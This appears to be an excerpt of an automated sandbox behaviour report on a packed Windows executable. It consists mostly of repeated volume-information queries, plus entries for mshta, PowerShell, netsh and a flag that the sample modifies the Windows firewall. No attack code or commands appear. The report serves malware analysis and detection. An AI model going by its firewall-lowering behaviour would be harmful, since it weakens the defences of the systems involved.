Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_asyncio.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_overlapped.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\multidict VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\multidict VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\multidict VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\multidict\_multidict.cp311-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\multidict VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\yarl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\yarl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\yarl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\yarl\_quoting_c.cp311-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp\_helpers.cp311-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp\_http_writer.cp311-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp\_http_parser.cp311-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\aiohttp\_websocket.cp311-win_amd64.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\_uuid.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\Desktop\9afaXJv52z.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\frozenlist VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\frozenlist VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\frozenlist VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\9afaXJv52z.exe

Code function: 0_2_00007FF6850BC460 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF6850BC460

Source: C:\Users\user\Desktop\9afaXJv52z.exe

Code function: 0_2_00007FF6850D6370 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF6850D6370

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Users\user\Desktop\9afaXJv52z.exe

